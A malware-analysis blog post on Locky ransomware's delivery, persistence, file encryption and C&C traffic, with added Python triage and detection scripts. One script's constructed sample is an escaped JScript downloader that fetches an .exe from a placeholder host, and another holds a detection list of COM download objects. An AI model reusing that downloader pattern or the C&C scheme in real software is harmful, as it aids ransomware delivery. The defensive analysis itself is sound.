Tuesday, March 22, 2016

A look at Locky ransomware


The Locky ransomware was first spotted in the wild in February 2016. Locky came into the limelight when it hit the Hollywood Hospital last month, causing the hospital to pay Bitcoins worth $17,000 in ransom. Locky is known to arrive via spam e-mails containing malicious attachments.

Zscaler has blocked over 75 unique new payloads from this ransomware family targeting our customers in the last month, as shown below:

Locky ransomware unique payloads blocked

The Locky payload delivery mechanism

The initial wave of Locky ransomware spam involved malicious Microsoft Office documents containing a VBA macro that downloads and executes the binary payload on the victim machine. Locky's authors have since switched to spamming a Zip archive containing malicious JavaScript that downloads and executes the Locky payload.

A sample malicious document from a Locky spam campaign, containing a VBA macro designed to download the Locky payload from a predetermined remote location, can be seen below:

Malicious Document

The second delivery mechanism involves heavily obfuscated JavaScript files in a Zip attachment. These JavaScript payloads leverage UTF-16 encoding to hide the download URL. The authors also change the obfuscated payload regularly in order to evade AV detection, a technique commonly used by Exploit Kit (EK) authors to protect EK landing pages. A sample of malicious JavaScript code delivering Locky ransomware can be seen below:

Obfuscated JavaScript to deliver Locky

The JavaScript uses ActiveX objects to download Locky ransomware onto the victim's machine. The decoded JavaScript is shown below:

Decoded JavaScript
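The obfuscation described above (UTF-16 code-unit escapes hiding the URL, plus ActiveX objects to fetch and write the payload) can be undone mechanically during triage. The following is an added example, not Zscaler's code and not the sample from the campaign: it decodes `\uXXXX`/`\xXX` escapes, then reports any URLs and `ActiveXObject(...)` names that become visible. The `SAMPLE_JS` string is constructed for illustration; `example.invalid` and the path in it are placeholders, and the list of COM object names is a generic set that Windows Script Host downloaders commonly use, not one taken from the blog's figure.

```python
"""Triage helper for obfuscated JScript downloaders: decode \\uXXXX (UTF-16
code unit) and \\xXX escapes, then look for download URLs and ActiveX objects.

Added example, not Zscaler's code.  SAMPLE_JS is constructed; the host and
path in it are placeholders.
"""
import re

# Constructed stand-in for an obfuscated downloader.  Only the object names
# and the URL are escaped as UTF-16 code units, the way the blog describes.
SAMPLE_JS = r"""
var a = new ActiveXObject("\u004d\u0053\u0058\u004d\u004c\u0032\u002e\u0058\u004d\u004c\u0048\u0054\u0054\u0050");
var b = new ActiveXObject("\u0041\u0044\u004f\u0044\u0042\u002e\u0053\u0074\u0072\u0065\u0061\u006d");
a.open("GET", "\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0069\u006e\u0076\u0061\u006c\u0069\u0064\u002f\u0064\u006f\u0063\u002f\u0038\u0037\u002e\u0065\u0078\u0065", false);
"""

_U_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_X_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)
ACTIVEX_RE = re.compile(r"ActiveXObject\s*\(\s*[\"']([^\"']+)[\"']", re.IGNORECASE)

# Generic WSH/COM object names a script needs to download and run a file.
# (Assumed list for the example, not taken from the blog's sample.)
ACTIVEX_OF_INTEREST = {
    "msxml2.xmlhttp", "microsoft.xmlhttp", "adodb.stream",
    "wscript.shell", "scripting.filesystemobject",
}


def decode_js_escapes(text: str) -> str:
    """Replace \\uXXXX and \\xXX escapes with the characters they encode.
    Two \\u escapes forming a surrogate pair are joined into one code point
    by the UTF-16 round trip; a lone surrogate becomes U+FFFD."""
    s = _U_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    s = _X_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    return s.encode("utf-16", "surrogatepass").decode("utf-16", "replace")


def triage_script(text: str) -> dict:
    """Decode the script and summarise what a downloader would need."""
    decoded = decode_js_escapes(text)
    urls = sorted(set(URL_RE.findall(decoded)))
    objs = sorted({m.group(1) for m in ACTIVEX_RE.finditer(decoded)})
    escape_count = len(_U_ESC.findall(text)) + len(_X_ESC.findall(text))
    uses_download_objects = any(o.lower() in ACTIVEX_OF_INTEREST for o in objs)
    return {
        "urls": urls,                       # URLs that were hidden by escapes
        "activex": objs,                    # ActiveX objects instantiated
        "escape_count": escape_count,       # how much of the text was escaped
        "downloader_like": bool(urls) and uses_download_objects,
    }


if __name__ == "__main__":
    for key, value in triage_script(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

The `escape_count` is useful on its own: benign scripts rarely escape long runs of printable ASCII, so a high count relative to the script length is a cheap first-pass signal before any URL is extracted.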

Payload Analysis

We have seen a large uptick in the delivery of Locky payloads during the month of March 2016.

Uptick in Locky payloads getting blocked

We looked at one of the newer Locky variants seen in the wild recently. The analyzed Locky payload is a 32-bit Microsoft Visual C++ compiled Windows executable packed using a custom packer routine.

Upon execution, the malware first checks the user and system default language preferences of the infected system and terminates itself if the language is Russian. Locky creates a copy of itself as "%TEMP%/svchost.exe" and an auto-start registry key entry to ensure persistence across system reboots. To mark a successful infection on the system, Locky creates the following registry keys with the value names "pubkey" and "paytext", as seen below:

Locky registry key

"pubkey" is used to store the RSA key used for encryption
"paytext" is used to store the payment-related information

Upon successful infection, Locky will encrypt the following file types on the victim machine:

File types encrypted

These encrypted files are renamed to the unique ID generated for the victim's machine, followed by a unique file ID and a ".locky" extension. The ransom note is displayed as a bitmap image that is also set as the wallpaper of the infected user's desktop, as seen below:
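Two of the host artefacts above, the dropped copy at `%TEMP%\svchost.exe` and the `<victim ID><file ID>.locky` rename, are enough to scope an infection from a file listing. The script below is an added example, not Zscaler's code, and makes two assumptions the blog does not state: that both IDs are hexadecimal (so an encrypted name is a run of hex digits ending in `.locky`), and that a legitimate `svchost.exe` never sits in a user's Temp directory. The listing it runs over is constructed for the example.

```python
"""Scope a suspected Locky infection from a list of file paths.

Added example, not Zscaler's code.  Works on a plain path list so it runs
offline; on a live host, feed it a filesystem walk.  Assumptions: victim ID
and file ID are hex (length not stated in the blog), and svchost.exe in a
Temp directory is never legitimate.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# <victim id><file id>.locky -- both IDs assumed hexadecimal, at least 16 digits
LOCKY_NAME = re.compile(r"^[0-9A-Fa-f]{16,}\.locky$")


def is_locky_name(name: str) -> bool:
    """True if a bare file name matches the renamed-file pattern."""
    return bool(LOCKY_NAME.match(name))


def is_temp_svchost(path: str) -> bool:
    """Locky drops a copy of itself as %TEMP%\\svchost.exe; the real one
    lives under System32, so flag svchost.exe only inside a Temp folder."""
    p = PureWindowsPath(path)
    parents = [part.lower() for part in p.parts[:-1]]
    return p.name.lower() == "svchost.exe" and "temp" in parents and "system32" not in parents


def triage_listing(paths):
    """Summarise encrypted files per directory and any dropped copies."""
    encrypted = [p for p in paths if is_locky_name(PureWindowsPath(p).name)]
    per_dir = Counter(str(PureWindowsPath(p).parent) for p in encrypted)
    dropped = [p for p in paths if is_temp_svchost(p)]
    return {
        "encrypted_count": len(encrypted),
        "affected_dirs": dict(per_dir),
        "dropper_copies": dropped,
        "infected": bool(encrypted) or bool(dropped),
    }


# Constructed listing: three renamed files, one untouched document, the
# dropped copy in Temp, and the legitimate svchost.exe for contrast.
CONSTRUCTED_LISTING = [
    r"C:\Users\alice\Documents\0123456789ABCDEF0011223344556677.locky",
    r"C:\Users\alice\Documents\0123456789ABCDEF8899AABBCCDDEEFF.locky",
    r"C:\Users\alice\Pictures\0123456789ABCDEF1234567812345678.locky",
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
    r"C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for key, value in triage_listing(CONSTRUCTED_LISTING).items():
        print(f"{key}: {value}")
```

Because every encrypted file on one machine shares the same victim-ID prefix, the prefix of the first `.locky` name found is also the quickest way to tie a pile of files back to one infected host when shares are involved.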

Ransom note

As in the case of other crypto-ransomware families, the victim's files are held hostage for a ransom. The ransom payment instructions for obtaining the private RSA key required to decrypt the user's files are readily available through the URLs mentioned in the ransom note.

Payment instructions

Command & Control communication

The Locky payload contains a list of hardcoded Command & Control (C&C) server IP addresses that appear in plain text in the unpacked binary as seen below:

Hardcoded C&C IPs

In addition, Locky also leverages a custom Domain Generation Algorithm (DGA) to hide its C&C server location. The DGA used for generating candidate C&C domains in the payload we analyzed can be seen below:

Domain Generation Algorithm

Locky communicates with the C&C server using custom encryption and the following HTTP request format:

POST http://[hardcoded IP or DGA domain]/main.php

Sample encrypted C&C communication

The initial C&C communication typically consists of three HTTP POST requests.

Request #1: Registers the infected system's unique ID and requests the RSA key to be used for encrypting user files. The figure below shows the content of this POST request in plain text:

C&C request #1

The server responds with an RSA key that Locky uses to encrypt all of the user's files on the victim machine.

Request #2: Requests the content of the ransom note to be displayed on the infected system asking for payment. Below is the content of this POST request as well as the response from the C&C server in decoded form:

C&C request #2 & response

Request #3: The final request sends statistics about the successfully encrypted files, as seen below:

C&C request #3
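The request shape given above (HTTP POST to `/main.php` on a bare IP address or DGA domain, with the initial check-in made up of three such POSTs) is enough to write a first-pass detection over proxy logs. The following is an added example, not Zscaler's code: it parses a simple space-separated log format, flags POSTs to `/main.php` whose host is an IP literal, and groups them per client so the three-request sequence stands out. The DGA-domain case is left out because it needs the DGA output the blog shows only in its figure. The log format and every address in the sample are constructed; `203.0.113.x` is a documentation range, not a Locky C&C.

```python
"""Flag Locky-style C&C check-ins in web proxy logs.

Added example, not Zscaler's code.  Indicator from the blog: HTTP POST to
http://<hardcoded IP or DGA domain>/main.php, three POSTs at first check-in.
Only the bare-IP form is matched here.  Log format (timestamp client
method url status) and all addresses are constructed for the example.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)
CNC_PATH = "/main.php"


def is_ip_literal(host: str) -> bool:
    """True for a dotted-quad or IPv6 host, i.e. no DNS name involved."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def parse_line(line: str):
    """Split one log line into fields plus the URL's host and path."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["host"] = parts.hostname or ""
    rec["path"] = parts.path
    return rec


def find_locky_checkins(lines):
    """Return {client: [hosts]} for clients POSTing to /main.php on an
    IP-literal host.  Three or more entries for one client match the
    initial three-request sequence the blog describes."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] == "POST" and rec["path"] == CNC_PATH
                and is_ip_literal(rec["host"])):
            hits[rec["client"]].append(rec["host"])
    return dict(hits)


# Constructed log: one client makes the three-POST check-in; the others
# show a POST to /main.php on a real hostname and a POST to an IP on a
# different path, neither of which should match.
CONSTRUCTED_LOG = [
    "2016-03-22T10:01:02Z 10.0.0.5 GET http://www.example.com/index.html 200",
    "2016-03-22T10:01:09Z 10.0.0.5 POST http://203.0.113.10/main.php 200",
    "2016-03-22T10:01:11Z 10.0.0.5 POST http://203.0.113.10/main.php 200",
    "2016-03-22T10:03:40Z 10.0.0.5 POST http://203.0.113.10/main.php 200",
    "2016-03-22T10:04:00Z 10.0.0.7 POST http://www.example.com/main.php 200",
    "2016-03-22T10:04:05Z 10.0.0.9 POST http://203.0.113.99/login 200",
]

if __name__ == "__main__":
    for client, hosts in find_locky_checkins(CONSTRUCTED_LOG).items():
        print(f"{client}: {len(hosts)} POST(s) to {CNC_PATH} on {sorted(set(hosts))}")
```

Matching on the IP-literal host rather than on a list of the hardcoded addresses keeps the rule useful after the authors rotate servers; the list of addresses from the unpacked binary can still be added as a second, higher-confidence check.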


Locky is the latest addition to ransomware, one of the most active and lucrative malware categories seen in the past three years. This new ransomware family follows the same model of using asymmetric (public-key) encryption to lock user documents and demand a ransom for the decryption key. The delivery vector has primarily been spammed e-mail attachments that download the Locky payload. We also noticed an interesting overlap in recent campaigns, where the same URLs were being used to deliver both Dridex and Locky payloads.

Zscaler’s ThreatLabZ has confirmed coverage for the initial downloader and Locky payloads, ensuring protection for organizations using Zscaler’s Internet security platform.

Research by: Deepen Desai, Dhanalakshmi PK
